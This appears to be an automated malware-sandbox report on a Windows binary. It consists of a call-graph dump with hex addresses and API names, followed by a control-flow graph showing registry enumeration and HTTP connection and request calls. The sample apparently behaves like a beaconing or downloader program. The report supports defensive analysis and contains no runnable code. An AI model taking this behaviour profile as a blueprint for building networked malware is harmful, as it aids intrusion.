14040->14041 14042 da5c10 4 API calls 14041->14042 14043 dae832 14042->14043 14044 da8580 RtlAllocateHeap 14043->14044 14046 dae83e 14044->14046 14045 daea8f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14045->13789 14046->14045 14047 db7a00 RtlAllocateHeap 14046->14047 14048 daeb19 14047->14048 14049 da5c10 4 API calls 14048->14049 14050 daeb21 14049->14050 14209 db83c0 14050->14209 14052 daeb36 14053 db8220 RtlAllocateHeap 14052->14053 14054 daeb45 14053->14054 14055 db7a00 RtlAllocateHeap 14054->14055 14056 daed60 14055->14056 14057 da5c10 4 API calls 14056->14057 14058 daed68 14057->14058 14059 db83c0 RtlAllocateHeap 14058->14059 14060 daed7d 14059->14060 14061 db8220 RtlAllocateHeap 14060->14061 14064 daed8c 14061->14064 14062 daf699 shared_ptr 14062->13789 14063 db80c0 RtlAllocateHeap 14063->14064 14064->14062 14064->14063 14065 daf6cb 14064->14065 14066 db7a00 RtlAllocateHeap 14065->14066 14067 daf727 14066->14067 14068 da5c10 4 API calls 14067->14068 14069 daf72e 14068->14069 14070 db7a00 RtlAllocateHeap 14069->14070 14071 daf741 14070->14071 14072 db7a00 RtlAllocateHeap 14071->14072 14073 daf756 14072->14073 14074 db7a00 RtlAllocateHeap 14073->14074 14075 daf76b 14074->14075 14076 db7a00 RtlAllocateHeap 14075->14076 14077 daf77d 14076->14077 14078 dae530 10 API calls 14077->14078 14079 daf786 14078->14079 14080 db80c0 RtlAllocateHeap 14079->14080 14081 daf7aa 14080->14081 14082 db7a00 RtlAllocateHeap 14081->14082 14083 daf7ba 14082->14083 14084 db80c0 RtlAllocateHeap 14083->14084 14085 daf7d7 14084->14085 14086 db80c0 RtlAllocateHeap 14085->14086 14088 daf7f0 14086->14088 14087 daf982 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14087->13789 14088->14087 14089 db7a00 RtlAllocateHeap 14088->14089 14090 dafa04 14089->14090 14091 da5c10 4 API calls 14090->14091 14092 dafa0b 14091->14092 14093 db7a00 RtlAllocateHeap 14092->14093 14094 dafa1e 14093->14094 14095 db7a00 RtlAllocateHeap 14094->14095 14096 dafa33 14095->14096 14097 db7a00 RtlAllocateHeap 14096->14097 14098 dafa48 14097->14098 14099 db7a00 RtlAllocateHeap 14098->14099 14100 dafa5a 14099->14100 14101 dae530 10 API calls 14100->14101 14103 dafa63 14101->14103 14102 dafb35 shared_ptr 14102->13789 14103->14102 14104 db7a00 RtlAllocateHeap 14103->14104 14105 dafba5 14104->14105 14217 da9580 14105->14217 14107 dafbb4 14232 da9230 14107->14232 14109 dafbc3 14110 db8320 RtlAllocateHeap 14109->14110 14111 dafbdb 14110->14111 14111->14111 14112 db80c0 RtlAllocateHeap 14111->14112 14113 dafc8c 14112->14113 14114 db7a00 RtlAllocateHeap 14113->14114 14115 dafca7 14114->14115 14116 db7a00 RtlAllocateHeap 14115->14116 14117 dafcb9 14116->14117 14118 db7a00 RtlAllocateHeap 14117->14118 14119 db05d4 14118->14119 14120 da5c10 4 API calls 14119->14120 14121 db05db 14120->14121 14122 db7a00 RtlAllocateHeap 14121->14122 14123 db05f1 14122->14123 14124 db7a00 RtlAllocateHeap 14123->14124 14125 db0609 14124->14125 14126 db7a00 RtlAllocateHeap 14125->14126 14127 db0621 14126->14127 14128 db7a00 RtlAllocateHeap 14127->14128 14129 db0633 14128->14129 14130 dae530 10 API calls 14129->14130 14132 db063c 14130->14132 14131 db0880 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14131->13789 14132->14131 14133 db7a00 RtlAllocateHeap 14132->14133 14134 db0987 14133->14134 14135 da5c10 4 API calls 14134->14135 14136 db098e 14135->14136 14137 db7a00 RtlAllocateHeap 14136->14137 14138 db09a4 14137->14138 14139 db7a00 RtlAllocateHeap 14138->14139 14140 db09bc 14139->14140 14141 db7a00 RtlAllocateHeap 14140->14141 14142 db09d4 14141->14142 14143 db7a00 RtlAllocateHeap 14142->14143 14144 db12e0 14143->14144 14145 dae530 10 API calls 14144->14145 14146 db12e9 14145->14146 14148 db85f6 14147->14148 14148->14148 14149 db860b 14148->14149 14150 db8f40 RtlAllocateHeap 14148->14150 14149->13797 14150->14149 14154 da89d8 shared_ptr 14151->14154 14158 da8aea 14151->14158 14152 db7a00 RtlAllocateHeap 14152->14154 14153 da5c10 4 API calls 14153->14154 14154->14152 14154->14153 14155 da8b20 14154->14155 14156 db80c0 RtlAllocateHeap 14154->14156 14154->14158 14157 db8200 RtlAllocateHeap 14155->14157 14156->14154 14157->14158 14158->13803 14160 da5f47 14159->14160 14161 da5ffe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14160->14161 14162 db80c0 RtlAllocateHeap 14160->14162 14161->13697 14163 da6089 14162->14163 14164 db80c0 RtlAllocateHeap 14163->14164 14165 da60bd 14164->14165 14166 db80c0 RtlAllocateHeap 14165->14166 14167 da60ee 14166->14167 14168 db80c0 RtlAllocateHeap 14167->14168 14169 da611f 14168->14169 14170 db80c0 RtlAllocateHeap 14169->14170 14171 da6150 RegOpenKeyExA 14170->14171 14172 da6493 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14171->14172 14176 da61a3 __cftof 14171->14176 14172->13697 14173 da6243 RegEnumValueA 14173->14176 14174 db80c0 RtlAllocateHeap 14174->14176 14175 db7a00 RtlAllocateHeap 14175->14176 14176->14172 14176->14173 14176->14174 14176->14175 14178 dd6762 14177->14178 14180 dd674d __dosmaperr __freea ___std_exception_copy 14177->14180 14178->14180 14181 dda038 14178->14181 14180->13997 14182 dda050 14181->14182 14184 dda075 14181->14184 14182->14184 14185 de0439 14182->14185 14184->14180 14186 de0445 __fassign 14185->14186 14188 de044d __dosmaperr ___std_exception_copy 14186->14188 14189 de052b 14186->14189 14188->14184 14190 de054d 14189->14190 14192 de0551 __dosmaperr ___std_exception_copy 14189->14192 14190->14192 14193 ddfcc0 14190->14193 14192->14188 14194 ddfd0d 14193->14194 14195 dd690a __fassign GetPEB GetPEB RtlAllocateHeap 14194->14195 14199 ddfd1c __cftof 14195->14199 14196 ddffbc __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14196->14192 14197 ddb67d GetPEB GetPEB 14197->14199 14198 ddc719 GetPEB GetPEB RtlAllocateHeap __fassign 14198->14199 14199->14196 14199->14197 14199->14198 14201 db86e0 14200->14201 14201->14201 14202 db7760 RtlAllocateHeap 14201->14202 14203 db86f9 14202->14203 14204 db8f40 RtlAllocateHeap 14203->14204 14205 db8714 14203->14205 14204->14205 14206 db8f40 RtlAllocateHeap 14205->14206 14208 db8769 14205->14208 14207 db87b1 14206->14207 14207->14002 14208->14002 14210 db7760 RtlAllocateHeap 14209->14210 14211 db8439 14210->14211 14212 db8f40 RtlAllocateHeap 14211->14212 14213 db8454 14211->14213 14212->14213 14214 db8f40 RtlAllocateHeap 14213->14214 14216 db84a8 14213->14216 14215 db84ee 14214->14215 14215->14052 14216->14052 14218 da95d4 14217->14218 14219 db80c0 RtlAllocateHeap 14218->14219 14220 da961c 14219->14220 14221 db7a00 RtlAllocateHeap 14220->14221 14226 da9635 shared_ptr 14221->14226 14222 da979f 14224 da97fe 14222->14224 14225 da98e0 14222->14225 14223 db7a00 RtlAllocateHeap 14223->14226 14227 db80c0 RtlAllocateHeap 14224->14227 14228 db8200 RtlAllocateHeap 14225->14228 14226->14222 14226->14223 14226->14225 14229 da5c10 4 API calls 14226->14229 14230 da9834 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14226->14230 14231 db80c0 RtlAllocateHeap 14226->14231 14227->14230 14228->14230 14229->14226 14230->14107 14231->14226 14233 da9284 14232->14233 14234 db80c0 RtlAllocateHeap 14233->14234 14235 da92cc 14234->14235 14236 db7a00 RtlAllocateHeap 14235->14236 14246 da92e5 shared_ptr 14236->14246 14237 da944f 14239 db80c0 RtlAllocateHeap 14237->14239 14238 db7a00 RtlAllocateHeap 14238->14246 14242 da94c6 shared_ptr 14239->14242 14240 da5c10 4 API calls 14240->14246 14241 da9543 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14241->14109 14242->14241 14243 db8200 RtlAllocateHeap 14242->14243 14245 da9578 14243->14245 14244 db80c0 RtlAllocateHeap 14244->14246 14246->14237 14246->14238 14246->14240 14246->14242 14246->14244 14248 da22e0 std::future_error::future_error RtlAllocateHeap 14247->14248 14249 dbc0fb 14248->14249 14249->13938 14251 da22e0 std::future_error::future_error RtlAllocateHeap 14250->14251 14252 dbc16f 14251->14252 14252->13247 14254 dd8868 3 API calls 14253->14254 14255 dd8bdc 14254->14255 14255->13294 14257 db80c0 RtlAllocateHeap 14256->14257 14264 da4707 shared_ptr 14257->14264 14258 da4976 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14258->13430 14259 db80c0 RtlAllocateHeap 14263 da4846 shared_ptr 14259->14263 14260 db80c0 RtlAllocateHeap 14260->14264 14261 db8f40 RtlAllocateHeap 14261->14263 14262 db8f40 RtlAllocateHeap 14262->14264 14263->14258 14263->14259 14263->14261 14265 da4994 14263->14265 14264->14260 14264->14262 14264->14263 14264->14265 14266 db80c0 RtlAllocateHeap 14265->14266 14267 da49f3 14266->14267 14268 db80c0 RtlAllocateHeap 14267->14268 14269 da4a0c 14268->14269 14270 da4690 RtlAllocateHeap 14269->14270 14271 da4a99 shared_ptr 14270->14271 14271->13430 14272 dba210 14273 dba290 14272->14273 14285 db71d0 14273->14285 14275 dba330 14305 da3840 14275->14305 14276 dba2cc 14276->14275 14293 db7d50 14276->14293 14279 dba39e shared_ptr 14280 dbd3e2 RtlAllocateHeap 14279->14280 14281 dba4be shared_ptr 14279->14281 14282 dba45e 14280->14282 14313 da3ee0 14282->14313 14284 dba4a6 14286 db7211 14285->14286 14287 dbd3e2 RtlAllocateHeap 14286->14287 14288 db7238 14287->14288 14289 dbd3e2 RtlAllocateHeap 14288->14289 14290 db7446 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14288->14290 14291 db73bb __cftof 14289->14291 14290->14276 14319 da2ec0 14291->14319 14294 db7dcb 14293->14294 14295 db7d62 14293->14295 14296 da2480 RtlAllocateHeap 14294->14296 14297 db7d6d 14295->14297 14298 db7d9c 14295->14298 14300 db7d7a 14296->14300 14297->14294 14301 db7d74 14297->14301 14299 db7db9 14298->14299 14302 dbd3e2 RtlAllocateHeap 14298->14302 14299->14275 14300->14275 14303 dbd3e2 RtlAllocateHeap 14301->14303 14304 db7da6 14302->14304 14303->14300 14304->14275 14306 da38f6 14305->14306 14307 da385f 14305->14307 14306->14279 14307->14306 14311 da38cd shared_ptr 14307->14311 14312 da391b 14307->14312 14308 db91e0 RtlAllocateHeap 14310 da3925 14308->14310 14309 db7d50 RtlAllocateHeap 14309->14306 14310->14279 14311->14309 14312->14308 14314 da3f48 14313->14314 14315 da3f1e 14313->14315 14316 da3f58 14314->14316 14368 da2c00 14314->14368 14315->14284 14316->14284 14320 da2f7e GetCurrentThreadId 14319->14320 14321 da2f06 14319->14321 14322 da2fef 14320->14322 14323 da2f94 14320->14323 14324 dbc6ac GetSystemTimePreciseAsFileTime 14321->14324 14322->14290 14323->14322 14330 dbc6ac GetSystemTimePreciseAsFileTime 14323->14330 14325 da2f12 14324->14325 14326 da301e 14325->14326 14327 da2f1d 14325->14327 14328 dbc26a 4 API calls 14326->14328 14331 dbd3e2 RtlAllocateHeap 14327->14331 14332 da2f30 __Mtx_unlock 14327->14332 14329 da3024 14328->14329 14333 dbc26a 4 API calls 14329->14333 14334 da2fb9 14330->14334 14331->14332 14332->14329 14335 da2f6f 14332->14335 14333->14334 14336 dbc26a 4 API calls 14334->14336 14337 da2fc0 __Mtx_unlock 14334->14337 14335->14320 14335->14322 14336->14337 14338 dbc26a 4 API calls 14337->14338 14339 da2fd8 __Cnd_broadcast 14337->14339 14338->14339 14339->14322 14340 dbc26a 4 API calls 14339->14340 14341 da303c 14340->14341 14342 dbc6ac GetSystemTimePreciseAsFileTime 14341->14342 14351 da3080 shared_ptr __Mtx_unlock 14342->14351 14343 da31c5 14344 dbc26a 4 API calls 14343->14344 14345 da31cb 14344->14345 14346 dbc26a 4 API calls 14345->14346 14347 da31d1 14346->14347 14348 dbc26a 4 API calls 14347->14348 14356 da3193 __Mtx_unlock 14348->14356 14349 da31a7 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14349->14290 14350 dbc26a 4 API calls 14353 da31dd 14350->14353 14351->14343 14351->14345 14351->14349 14352 da3132 GetCurrentThreadId 14351->14352 14352->14349 14354 da313b 14352->14354 14354->14349 14355 dbc6ac GetSystemTimePreciseAsFileTime 14354->14355 14357 da315f 14355->14357 14356->14349 14356->14350 14357->14343 14357->14347 14357->14356 14359 dbbd4c 14357->14359 14362 dbbb72 14359->14362 14361 dbbd5c 14361->14357 14363 dbbb9c 14362->14363 14364 dbcf6b _xtime_get GetSystemTimePreciseAsFileTime 14363->14364 14367 dbbba4 __Xtime_diff_to_millis2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14363->14367 14365 dbbbcf __Xtime_diff_to_millis2 14364->14365 14366 dbcf6b _xtime_get GetSystemTimePreciseAsFileTime 14365->14366 14365->14367 14366->14367 14367->14361 14369 dbd3e2 RtlAllocateHeap 14368->14369 14370 da2c0e 14369->14370 14378 dbb847 14370->14378 14372 da2c49 14372->14284 14373 da2c42 14373->14372 14384 da2c80 14373->14384 14375 da2c58 14387 da2560 14375->14387 14377 da2c65 std::_Xinvalid_argument 14379 dbb854 14378->14379 14383 dbb873 Concurrency::details::_Reschedule_chore 14378->14383 14390 dbcb77 14379->14390 14381 dbb864 14381->14383 14392 dbb81e 14381->14392 14383->14373 14398 dbb7fb 14384->14398 14386 da2cb2 shared_ptr 14386->14375 14388 dd38af ___std_exception_copy RtlAllocateHeap 14387->14388 14389 da2597 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14388->14389 14389->14377 14391 dbcb92 CreateThreadpoolWork 14390->14391 14391->14381 14393 dbb827 Concurrency::details::_Reschedule_chore 14392->14393 14396 dbcdcc 14393->14396 14395 dbb841 14395->14383 14397 dbcde1 TpPostWork 14396->14397 14397->14395 14399 dbb817 14398->14399 14400 dbb807 14398->14400 14399->14386 14400->14399 14402 dbca78 14400->14402 14403 dbca8d TpReleaseWork 14402->14403 14403->14399 14407 db87d0 14408 dbd3e2 RtlAllocateHeap 14407->14408 14409 db882a __cftof 14408->14409 14417 db9bb0 14409->14417 14411 db8854 14415 db886c __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14411->14415 14421 da43f0 14411->14421 14416 db88df 14418 db9be5 14417->14418 14430 da2ce0 14418->14430 14420 db9c16 14420->14411 14422 dbbedf InitOnceExecuteOnce 14421->14422 14423 da440a 14422->14423 14424 da4411 14423->14424 14425 dd6cbb 2 API calls 14423->14425 14427 dbbe50 14424->14427 14426 da4424 14425->14426 14474 dbbd8b 14427->14474 14429 dbbe66 std::_Xinvalid_argument std::_Throw_future_error 14429->14416 14431 da2d1d 14430->14431 14432 dbbedf InitOnceExecuteOnce 14431->14432 14433 da2d46 14432->14433 14434 da2d51 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14433->14434 14435 da2d88 14433->14435 14439 dbbef7 14433->14439 14434->14420 14448 da2440 14435->14448 14440 dbbf03 14439->14440 14451 da2900 14440->14451 14442 dbbf23 std::_Xinvalid_argument 14443 dbbf6a 14442->14443 14444 dbbf73 14442->14444 14459 dbbe7f 14443->14459 14446 da2ae0 3 API calls 14444->14446 14447 dbbf6f 14446->14447 14447->14435 14469 dbb5d6 14448->14469 14450 da2472 14452 db80c0 RtlAllocateHeap 14451->14452 14453 da294f 14452->14453 14454 da26b0 RtlAllocateHeap 14453->14454 14456 da2967 14454->14456 14455 da298d shared_ptr 14455->14442 14456->14455 14457 dd38af ___std_exception_copy RtlAllocateHeap 14456->14457 14458 da29e4 14457->14458 14458->14442 14460 dbcc31 InitOnceExecuteOnce 14459->14460 14461 dbbe97 14460->14461 14462 dbbe9e 14461->14462 14465 dd6cbb 14461->14465 14462->14447 14466 dd6cc7 __fassign 14465->14466 14467 dd8bec __fassign 2 API calls 14466->14467 14468 dd6cf6 14467->14468 14470 dbb5f1 std::_Xinvalid_argument 14469->14470 14471 dd8bec __fassign 2 API calls 14470->14471 14473 dbb658 __fassign __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14470->14473 14472 dbb69f 14471->14472 14473->14450 14475 da22e0 std::future_error::future_error RtlAllocateHeap 14474->14475 14476 dbbd9f 14475->14476 14476->14429 14404 dd6629 14405 dd64c7 __fassign 2 API calls 14404->14405 14406 dd663a 14405->14406 14614 dbb92e 14615 dbb7b5 5 API calls 14614->14615 14616 dbb956 14615->14616 14617 dbb718 5 API calls 14616->14617 14618 dbb96f 14617->14618 12841 dd6a44 12842 dd6a5c 12841->12842 12843 dd6a52 12841->12843 12848 dd698d 12842->12848 12845 dd6a76 12851 dd68ed 12845->12851 12847 dd6a83 __freea 12854 dd690a 12848->12854 12850 dd699f 12850->12845 12890 dd683b 12851->12890 12853 dd6905 12853->12847 12855 dd692a 12854->12855 12859 dd6921 12854->12859 12855->12859 12860 ddb5fb 12855->12860 12859->12850 12861 ddb60e 12860->12861 12862 dd6960 12860->12862 12861->12862 12868 ddf5ab 12861->12868 12864 ddb628 12862->12864 12865 ddb63b 12864->12865 12866 ddb650 12864->12866 12865->12866 12873 dde6b1 12865->12873 12866->12859 12870 ddf5b7 __fassign 12868->12870 12869 ddf606 12869->12862 12870->12869 12871 dd8bec __fassign 2 API calls 12870->12871 12872 ddf62b 12871->12872 12874 dde6bb 12873->12874 12877 dde5c9 12874->12877 12876 dde6c1 12876->12866 12878 dde5d5 __fassign __freea 12877->12878 12879 dd8bec __fassign 2 API calls 12878->12879 12880 dde5f6 12878->12880 12881 dde668 12879->12881 12880->12876 12882 dde6a4 12881->12882 12886 dda72e 12881->12886 12882->12876 12887 dda751 12886->12887 12888 dd8bec __fassign 2 API calls 12887->12888 12889 dda7c7 12888->12889 12891 dd6863 12890->12891 12893 dd6849 __dosmaperr __fassign 12890->12893 12892 dd686a 12891->12892 12895 dd6889 __fassign 12891->12895 12892->12893 12897 dd69e6 12892->12897 12893->12853 12895->12893 12896 dd69e6 RtlAllocateHeap 12895->12896 12896->12893 12898 dd69f4 12897->12898 12901 dd6a25 12898->12901 12904 ddb04b 12901->12904 12903 dd6a05 12903->12893 12906 ddb087 __dosmaperr 12904->12906 12907 ddb059 __fassign 12904->12907 12905 ddb074 RtlAllocateHeap 12905->12906 12905->12907 12906->12903 12907->12905 12907->12906 12637 dae0c0 recv 12638 dae122 recv 12637->12638 12639 dae157 recv 12638->12639 12640 dae191 12639->12640 12642 dae2b3 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12640->12642 12646 dbc6ac 12640->12646 12653 dbc452 12646->12653 12648 dae2ee 12649 dbc26a 12648->12649 12650 dbc292 12649->12650 12651 dbc274 12649->12651 12650->12650 12651->12650 12670 dbc297 12651->12670 12654 dbc4a8 12653->12654 12656 dbc47a __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12653->12656 12654->12656 12659 dbcf6b 12654->12659 12656->12648 12657 dbc4fd __Xtime_diff_to_millis2 12657->12656 12658 dbcf6b _xtime_get GetSystemTimePreciseAsFileTime 12657->12658 12658->12657 12660 dbcf7a 12659->12660 12662 dbcf87 __aulldvrm 12659->12662 12660->12662 12663 dbcf44 12660->12663 12662->12657 12666 dbcbea 12663->12666 12667 dbcbfb GetSystemTimePreciseAsFileTime 12666->12667 12668 dbcc07 12666->12668 12667->12668 12668->12662 12675 da2ae0 12670->12675 12674 dbc2bf std::_Xinvalid_argument 12674->12651 12687 dbbedf 12675->12687 12677 da2aff 12681 dbc1ff 12677->12681 12679 dd6cf6 12680 da2af4 __fassign 12680->12677 12690 dd8bec 12680->12690 12682 dbc20b __EH_prolog3_GS 12681->12682 12720 db80c0 12682->12720 12684 dbc23d 12733 da26b0 12684->12733 12686 dbc252 12686->12674 12696 dbcc31 12687->12696 12691 dd8bf1 __fassign 12690->12691 12694 dd8bfc ___std_exception_copy 12691->12694 12700 ddd634 12691->12700 12705 dd65ed 12694->12705 12695 dd8c2f __dosmaperr __fassign 12695->12679 12697 dbcc3f InitOnceExecuteOnce 12696->12697 12699 dbbef2 12696->12699 12697->12699 12699->12680 12701 ddd640 __fassign 12700->12701 12702 dd65ed __fassign 2 API calls 12701->12702 12703 ddd69c __dosmaperr __fassign ___std_exception_copy 12701->12703 12704 ddd82e __dosmaperr __fassign 12702->12704 12703->12694 12704->12694 12708 dd64c7 12705->12708 12709 dd64d5 __fassign 12708->12709 12710 dd6520 12709->12710 12713 dd652b 12709->12713 12710->12695 12718 dda302 GetPEB 12713->12718 12715 dd6535 12716 dd653a GetPEB 12715->12716 12717 dd654a __fassign 12715->12717 12716->12717 12719 dda31c __fassign 12718->12719 12719->12715 12722 db80de 12720->12722 12724 db8104 12720->12724 12722->12684 12723 db81f3 12727 da2480 RtlAllocateHeap 12723->12727 12725 db8158 12724->12725 12726 db817d 12724->12726 12728 db8169 12724->12728 12725->12723 12730 dbd3e2 RtlAllocateHeap 12725->12730 12726->12728 12731 dbd3e2 RtlAllocateHeap 12726->12731 12729 db81f8 12727->12729 12732 db81d0 shared_ptr 12728->12732 12742 db9270 12728->12742 12730->12728 12731->12728 12732->12684 12734 db7a00 RtlAllocateHeap 12733->12734 12735 da2702 12734->12735 12736 da2725 12735->12736 12754 db8f40 12735->12754 12738 db8f40 RtlAllocateHeap 12736->12738 12739 da278e shared_ptr 12736->12739 12738->12739 12740 dd38af ___std_exception_copy RtlAllocateHeap 12739->12740 12741 da284b shared_ptr ___std_exception_destroy __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12739->12741 12740->12741 12741->12686 12745 dbc1b9 12742->12745 12748 dbc123 12745->12748 12747 dbc1ca std::_Xinvalid_argument 12751 da22e0 12748->12751 12750 dbc135 12750->12747 12752 dd38af ___std_exception_copy RtlAllocateHeap 12751->12752 12753 da2317 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12752->12753 12753->12750 12755 db8f6b 12754->12755 12756 db908e 12754->12756 12759 db8fdc 12755->12759 12760 db8fb2 12755->12760 12757 db9270 RtlAllocateHeap 12756->12757 12758 db9093 12757->12758 12761 da2480 RtlAllocateHeap 12758->12761 12764 dbd3e2 RtlAllocateHeap 12759->12764 12765 db8fc3 12759->12765 12760->12758 12762 db8fbd 12760->12762 12761->12765 12763 dbd3e2 RtlAllocateHeap 12762->12763 12763->12765 12764->12765 12766 db90b8 12765->12766 12768 db904c shared_ptr 12765->12768 12769 da2480 std::_Xinvalid_argument 12765->12769 12767 dbd3e2 RtlAllocateHeap 12766->12767 12767->12768 12768->12736 12770 dd38af ___std_exception_copy RtlAllocateHeap 12769->12770 12771 da24c3 12770->12771 12771->12736 12772 dac8e0 12773 dac937 12772->12773 12778 db8de0 12773->12778 12775 dac94c 12776 db8de0 RtlAllocateHeap 12775->12776 12777 dac988 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12776->12777 12779 db8f2f 12778->12779 12780 db8e05 12778->12780 12781 db9270 RtlAllocateHeap 12779->12781 12784 db8e4c 12780->12784 12785 db8e76 12780->12785 12782 db8f34 12781->12782 12783 da2480 RtlAllocateHeap 12782->12783 12789 db8e5d shared_ptr __cftof 12783->12789 12784->12782 12786 db8e57 12784->12786 12787 dbd3e2 RtlAllocateHeap 12785->12787 12785->12789 12788 dbd3e2 RtlAllocateHeap 12786->12788 12787->12789 12788->12789 12789->12775 14575 da8780 14576 da8786 14575->14576 14577 da87a6 14576->14577 14578 dd67b7 3 API calls 14576->14578 14579 da87a0 14578->14579 14584 dab1a0 14585 dab1f2 14584->14585 14586 db80c0 RtlAllocateHeap 14585->14586 14587 dab233 14586->14587 14588 db7a00 RtlAllocateHeap 14587->14588 14589 dab2dd 14588->14589 14590 dae500 14591 dae525 14590->14591 14593 dae509 14590->14593 14593->14591 14594 dae360 14593->14594 14595 dae370 __dosmaperr 14594->14595 14596 dd8ab6 3 API calls 14595->14596 14597 dae3ad 14596->14597 14598 dbc199 std::_Xinvalid_argument RtlAllocateHeap 14597->14598 14600 dae4fe 14598->14600 14599 dae525 14599->14593 14600->14599 14601 dae360 4 API calls 14600->14601 14601->14600 12790 db88e0 12791 db8ac7 12790->12791 12793 db8936 12790->12793 12802 db91e0 12791->12802 12794 db8ac2 12793->12794 12796 db897c 12793->12796 12797 db89a3 12793->12797 12795 da2480 RtlAllocateHeap 12794->12795 12795->12791 12796->12794 12798 db8987 12796->12798 12800 dbd3e2 RtlAllocateHeap 12797->12800 12801 db898d shared_ptr 12797->12801 12799 dbd3e2 RtlAllocateHeap 12798->12799 12799->12801 12800->12801 12803 dbc1b9 RtlAllocateHeap 12802->12803 12804 db91ea 12803->12804 14477 db79c0 14478 db79e0 14477->14478 14478->14478 14479 db80c0 RtlAllocateHeap 14478->14479 14480 db79f2 14479->14480 14481 db93e0 14482 db9433 14481->14482 14483 db93f5 14481->14483 14489 dbd111 14483->14489 14491 dbd122 14489->14491 14490 db93ff 14490->14482 14493 dbd64e 14490->14493 14491->14490 14500 dbd199 14491->14500 14504 dbd621 14493->14504 14496 dbd0c7 14498 dbd0d6 14496->14498 14497 dbd17f 14497->14482 14498->14497 14499 dbd17b RtlWakeAllConditionVariable 14498->14499 14499->14482 14501 dbd1c0 14500->14501 14502 dbd1a7 SleepConditionVariableCS 14500->14502 14501->14491 14502->14501 14505 dbd630 14504->14505 14506 dbd637 14504->14506 14510 dd988e 14505->14510 14513 dd98fa 14506->14513 14509 db9429 14509->14496 14511 dd98fa RtlAllocateHeap 14510->14511 14512 dd98a0 14511->14512 14512->14509 14516 dd9630 14513->14516 14515 dd992b 14515->14509 14517 dd963c __fassign 14516->14517 14520 dd968b 14517->14520 14519 dd9657 14519->14515 14521 dd96a7 14520->14521 14522 dd9714 __fassign __freea 14520->14522 14521->14522 14525 dd96f4 __freea 14521->14525 14526 ddedf6 14521->14526 14522->14519 14524 ddedf6 RtlAllocateHeap 14524->14522 14525->14522 14525->14524 14527 ddee03 14526->14527 14529 ddee0f __cftof __dosmaperr 14527->14529 14530 de500f 14527->14530 14529->14525 14531 de501c 14530->14531 14533 de5024 __dosmaperr __fassign __freea 14530->14533 14532 ddb04b __fassign RtlAllocateHeap 14531->14532 14532->14533 14533->14529

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1309 dabe30-dabe7c 1310 dabe82-dabe86 1309->1310 1311 dac281-dac2a6 call db80c0 1309->1311 1310->1311 1313 dabe8c-dabe90 1310->1313 1316 dac2a8-dac2b4 1311->1316 1317 dac2d4-dac2ec 1311->1317 1313->1311 1315 dabe96-dabf2a Sleep InternetOpenW InternetConnectA call db7a00 call da5c10 1313->1315 1341 dabf2e-dabf4a HttpOpenRequestA 1315->1341 1342 dabf2c 1315->1342 1320 dac2ca-dac2d1 call dbd663 1316->1320 1321 dac2b6-dac2c4 1316->1321 1322 dac238-dac250 1317->1322 1323 dac2f2-dac2fe 1317->1323 1320->1317 1321->1320 1327 dac34f-dac354 call dd6c6a 1321->1327 1324 dac323-dac33f call dbcff1 1322->1324 1325 dac256-dac262 1322->1325 1329 dac22e-dac235 call dbd663 1323->1329 1330 dac304-dac312 1323->1330 1331 dac268-dac276 1325->1331 1332 dac319-dac320 call dbd663 1325->1332 1329->1322 1330->1327 1338 dac314 1330->1338 1331->1327 1340 dac27c 1331->1340 1332->1324 1338->1329 1340->1332 1347 dabf7b-dabfea call db7a00 call da5c10 call db7a00 call da5c10 1341->1347 1348 dabf4c-dabf5b 1341->1348 1342->1341 1361 dabfee-dac004 HttpSendRequestA 1347->1361 1362 dabfec 1347->1362 1349 dabf5d-dabf6b 1348->1349 1350 dabf71-dabf78 call dbd663 1348->1350 1349->1350 1350->1347 1363 dac006-dac015 1361->1363 1364 dac035-dac05d 1361->1364 1362->1361 1365 dac02b-dac032 call dbd663 1363->1365 1366 dac017-dac025 1363->1366 1367 dac08e-dac0af InternetReadFile 1364->1367 1368 dac05f-dac06e 1364->1368 1365->1364 1366->1365 1369 dac0b5 1367->1369 1371 dac070-dac07e 1368->1371 1372 dac084-dac08b call dbd663 1368->1372 1373 dac0c0-dac170 call dd4250 1369->1373 1371->1372 1372->1367
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(000005DC), ref: 00DABEB8
                                                                                                                                        • InternetOpenW.WININET(00DF8DC8,00000000,00000000,00000000,00000000), ref: 00DABEC8
                                                                                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00DABEEC
                                                                                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 00DABF36
                                                                                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 00DABFF6
